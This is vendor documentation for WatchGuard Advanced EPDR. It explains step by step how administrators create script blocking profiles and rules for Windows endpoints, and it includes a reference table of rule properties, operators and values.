Configure Script Blocking (Windows Computers)

Applies To: WatchGuard Advanced EPDR This topic applies to the WatchGuard Advanced EPDR endpoint security product.

On the Script Blocking page, you configure rules to allow or block scripts on your endpoints.

Create a script blocking settings profile that you assign to the computers on your network. The settings profile contains a list of rules, and each rule includes a series of attributes that describe a script and an action (block or allow).

Each time a user tries to run a script on the endpoint, Advanced EPDR goes through the rules in the specified order and compares the script with the attributes defined in each rule. When it finds a rule that matches the script, it applies the corresponding action and ends the process. No other rules are considered.

Your operator role determines what you can see and do in WatchGuard Cloud. Your role must have the Configure Script Blocking permission to view or configure this feature. For more information, go to Manage WatchGuard Cloud Operators and Roles.

To configure rules to allow or block scripts:

1. In WatchGuard Cloud, select Configure > Endpoint Security.
2. Select Settings.
3. From the left pane, select Script Blocking.
   The list of existing Script Blocking profiles opens.

   

4. Select an existing script blocking profile to edit, copy an existing profile, or in the upper-right corner of the page, click Add to create a new profile.
   The Add Settings or Edit Settings page opens.

   

5. Type a Name and Description for the profile, if required.
6. To add a new rule, click Add Rule.
   The Add Rule page opens.

   

7. In the Name text box, type a name for the rule.
8. From the Action drop-down list, select Allow or Block.
9. To make the rule active, enable the Active toggle.
10. To configure the conditions for the rule:
    1. From the Select a Property drop-down list, select a property.
    2. From the Select an Operator drop-down list, select an operator.
    3. From the Select a Value drop-down list, select a value.
       For more information, go to Operators and Values for Each Property.
11. To add conditions to this rule, click and repeat Step 10.
12. To remove a condition from this rule, click .
13. Click Save.
    The rule you added shows at the end of the list of rules..

    

14. To add more rules to the settings profile, repeat Steps 6 - 13.
15. To change rule order, drag a rule to a new position in the list.
    The script blocking action applies to the first rule in the list that matches the attributes of the script. If no rule matches, the script is allowed to run.
16. To notify computer users about scripts blocked by any of the rules, enable the Notify Computer Users About Blocked Scripts toggle.
17. (Optional) To add a custom message to the alerts that show on the endpoint, type a message in the Add the Following Custom Message to Alerts text box.
18. Click Save.
19. Select the profile and assign recipients, if required.
    For more information, go to Assign a Settings Profile.

To delete a rule from the profile, click .

Operators and Values for Each Property

In a Script Blocking rule, you must select a property, operator, and value for each condition that you configure. This table shows the operator and possible values for each property.

Property	Description	Operators	Values
Command line	Command line used to run the script.	Is equal to Contains Starts with Ends with	text
Execution	Script execution type (local or remote).	Is equal to	Local Remote
Execution user	User account that ran the script.	Is equal to In Starts with Ends with	text
Interactive execution	Script requires an interactive shell.	Is equal to	Yes No
Loader file name	Name of the file that interprets the script.	Is equal to In Contains Starts with Ends with	text
Loader MD5	MD5 of the file that interprets the script.	In Is equal to	text
Loader path	Path of the file that interprets the script.	Is equal to Contains Starts with Ends with	text
Loader SHA-256	SHA-256 of the file that interprets the script.	In Is equal to	text
Owner	Owner of the file that contains the script. Group: Specifies the group name. Example: Administrators. Domain user: Specifies the user principal name (UPN) of the account stored in Active Directory. Example: [email protected] Local user: Specifies the computer name and the local user account. Example: COMPUTER\Administrator.	Is equal to In Starts with Ends with	text
Script file name	Name of the file that contains the script.	Is equal to In Contains Starts with Ends with	text
Script MD5	MD5 of the file that contains the script.	In Is equal to	text
Script path	Path of the file that contains the script.	Is equal to Contains Starts with Ends with	text
Script SHA-256	SHA-256 of the file that contains the script.	In Is equal to	text
Script type	Programming language used to write the script, according to the file extension: PowerShell: Script written for the PowerShell command line BAT/CMD/LNK: Script written for the cmd.exe command line AutoIt: For more information, go to https://www.autoitscript.com/site/ VBS/JS: Script written in Visual Basic Script/JavaScript Python: For more information, go to https://www.python.org/ PHP: For more information, go to https://www.php.net/ Perl: For more information, go to https://www.perl.org/ Ruby: For more information, go to https://www.ruby-lang.org/ AutoHotkey: For more information, go to https://www.autohotkey.com/	In Is equal to	PowerShell BAAT/CMD/LNK AutoIt VBS/JS Python PHP MSHTA

Related Topics

Manage Endpoint Groups in Endpoint Security

Assign a Settings Profile

Multi-Tenant Management — Script Control